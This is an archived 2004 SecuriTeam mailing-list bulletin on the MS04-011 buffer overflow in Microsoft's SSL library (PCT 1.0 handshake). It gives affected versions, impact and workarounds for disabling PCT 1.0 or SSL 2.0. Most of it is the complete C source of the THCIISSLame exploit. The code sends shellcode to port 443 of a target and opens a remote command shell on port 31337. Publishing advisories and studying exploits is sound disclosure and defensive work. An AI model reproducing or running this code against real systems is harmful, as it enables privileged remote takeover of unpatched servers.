[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/22/04

  • Next message: SecuriTeam: "[EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit"
    To: list@securiteam.com
    Date: 22 Apr 2004 12:44:31 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    ISS X-Force has discovered a remotely exploitable buffer overflow
    condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
    encryption technology commonly used to secure Web and email
    communications. A buffer overflow condition occurs when processing PCT 1.0
    handshake packets that can lead to remote, privileged compromise of
    affected Windows installations.

    DETAILS

    Affected Versions:
     * Microsoft Windows 2000 up to and including SP4
     * Microsoft Windows NT version 4 up to and including SP6a
     * Microsoft Windows XP up to SP1

    Note: The SSL library included in Windows Server 2003 contains the
    vulnerability. However, the PCT 1.0 protocol is disabled by default.

    Impact:
    If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
    protocols are enabled, remote attackers may exploit the buffer overflow
    condition to execute arbitrary code on vulnerable Windows server
    installations. This code would run with local system privileges. The
    protocols necessary for remote exploitation are enabled by default in
    Windows 2000 and Windows NT version 4.

    Common vectors for exploitation might include Internet Information Server
    (IIS), Exchange Server, Active Directory, and potentially any software
    making use of the Microsoft SSL library including unlisted third-party
    software.

    The severity of this vulnerability is compounded by the fact that SSL is
    most often used to secure communications involving confidential or
    valuable financial information, and that Firewalls and packet filtering
    alone will not be able to stop attacks. X-Force believes that hackers will
    aggressively target this vulnerability given the high-value nature of Web
    sites protected by SSL.

    Solution:
    The PCT 1.0 protocol is a legacy protocol that is not required for secure
    SSL communication. The PCT 1.0 protocol can be safely disabled as a
    workaround for the vulnerability described in this advisory. However,
    systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0
    without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
    disabled to close the vulnerability. Successful exploitation of the
    vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The
    vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.

    Customers are encouraged to immediately evaluate the two scenarios
    described above and select a workaround that best applies to their
    environment.

    Microsoft has published a Knowledge Base article (187498) that describes
    how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
    3.0. Microsoft Knowledge Base article 187498 is available at the following
    address:
     <http://support.microsoft.com/support/kb/articles/q187/4/98.asp>
    http://support.microsoft.com/support/kb/articles/q187/4/98.asp

    Additional Information:
    Microsoft Security Bulletin MS04-011:
    <http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx>
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

    Exploit:
    /*****************************************************************************/
    /* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
    /* THC PUBLIC SOURCE MATERIALS */
    /* */
    /* Bug was found by Internet Security Systems */
    /* Reversing credits of the bug go to Halvar Flake */
    /* */
    /* compile with MS Visual C++ : cl THCIISSLame.c */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,
    dvorak, */
    /* scut, stealth, FtR and Random */
    /*****************************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    #pragma comment(lib, "ws2_32.lib")

    #define jumper "\xeb\x0f"
    #define greetings_to_microsoft
    "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

    char sslshit[] =
    "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

    char shellcode[] =
    "\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
    "\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
    "\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
    "\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
    "\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
    "\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
    "\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
    "\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
    "\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
    "\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
    "\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
    "\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
    "\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
    "\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
    "\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
    "\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
    "\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
    "\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
    "\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
    "\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
    "\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

    void usage();
    void shell(int sock);

    int main(int argc, char *argv[])
    {
      unsigned int i,sock,sock2,addr,rc;
      unsigned char *badbuf,*p;
      unsigned long offset = 0x6741a1cd;
      unsigned long XOR = 0xffffffff;

      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
      printf("tested on Windows 2000 Server german/english SP4\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

      if(argc<2 || argc>2)
       usage();

      badbuf = malloc(347);
      memset(badbuf,0,347);

      printf("\n[*] building buffer\n");

      p = badbuf;

      memcpy(p,sslshit,sizeof(sslshit));

      p+=sizeof(sslshit)-1;
      
      strcat(p,jumper);

      strcat(p,greetings_to_microsoft);

      offset^=XOR;
      strncat(p,(unsigned char *)&offset,4);

      strcat(p,shellcode);

      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
      {
       printf("WSAStartup failed !\n");
       exit(-1);
      }
      
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      }
      if ((!hp) && (addr == INADDR_NONE) )
      {
       printf("Unable to resolve %s\n",argv[1]);
       exit(-1);
      }

      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      if (!sock)
      {
       printf("socket() error...\n");
       exit(-1);
      }
      
      if (hp != NULL)
       memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
      else
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
      else
       mytcp.sin_family = AF_INET;

      mytcp.sin_port=htons(443);

      printf("[*] connecting the target\n");

      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
    sockaddr_in));
      if(rc==0)
      {
          send(sock,badbuf,346,0);
          printf("[*] Exploit send successfully ! Sleeping a while ....\n");
          Sleep(1000);
      }
      else
       printf("\nCan't connect to ssl port 443!\n");
       
      if(rc==0)
      {
       printf("[*] Trying to get a shell\n\n");
       sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
       mytcp.sin_port = htons(31337);
       rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
       if(rc!=0)
       {
         printf("can't connect to port 31337 ;( maybe firewalled ...\n");
         exit(-1);
       }
       shell(sock2);
      }

      shutdown(sock,1);
      closesocket(sock);

      free(badbuf);

      exit(0);
    }
     
    void usage()
    {
     unsigned int a;
     printf("\nUsage: <Host>\n");
     printf("Sample: THCIISSLame 31.33.7.23\n\n");
     exit(0);
    }

    void shell(int sock)
    {
     int l;
     char buf[1024];
     struct timeval time;
     unsigned long ul[2];

     time.tv_sec = 1;
     time.tv_usec = 0;

     while (1)
     {
      ul[0] = 1;
      ul[1] = sock;

      l = select (0, (fd_set *)&ul, NULL, NULL, &time);
      if(l == 1)
      {
       l = recv (sock, buf, sizeof (buf), 0);
       if (l <= 0)
       {
        printf ("bye bye...\n");
        return;
       }
      l = write (1, buf, l);
       if (l <= 0)
       {
        printf ("bye bye...\n");
        return;
       }
      }
      else
      {
       l = read (0, buf, sizeof (buf));
       if (l <= 0)
       {
        printf("bye bye...\n");
        return;
       }
       l = send(sock, buf, l, 0);
       if (l <= 0)
       {
        printf("bye bye...\n");
        return;
       }
      }
     }
    }

    ADDITIONAL INFORMATION

    The information has been provided by Mark Dowd and Neel Mehta of the ISS
    X-Force.

    The exploit has been provided by: <mailto:johncybpk@gmx.net> johnny
    cyberpunk of THC

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit"

    Relevant Pages

    • Re: SSL Stops Working
      ... I have had SSL stop working as well with the same event occuring just ... The security package Microsoft Unified Security Protocol Provider ... After finding this thread I read Microsoft Security Bulletin MS04-011 ...
      (microsoft.public.inetserver.iis.security)
    • PCT 1.0
      ... Tools-Internet Options- Security, then check SSL 2.0, SSL ... I have done all that but PCT ...
      (microsoft.public.windowsxp.security_admin)
    • Administrivia #36302 - Microsoft Security Bulletins
      ... A while ago I made the decision not to put through every Microsoft ... Microsoft Security Bulletin in a timely fashion. ... Do you have 128-bit SSL encryption server security? ...
      (NT-Bugtraq)
    • Re: SSL site administration secure?
      ... It's always possible to break any security, ... I think is you're running over SSL and then all should be fine. ... Microsoft ASP.NET MVP ...
      (microsoft.public.dotnet.framework.aspnet)
    • RE: Active Sync OMA http/1.1 500 error
      ... > use Basic Authentication for these three VD, disable SSL Windows ... > Microsoft CSS Online Newsgroup Support ... > This newsgroup only focuses on SBS technical issues. ... > | But by disabling it my OWA stopped to work. ...
      (microsoft.public.windows.server.sbs)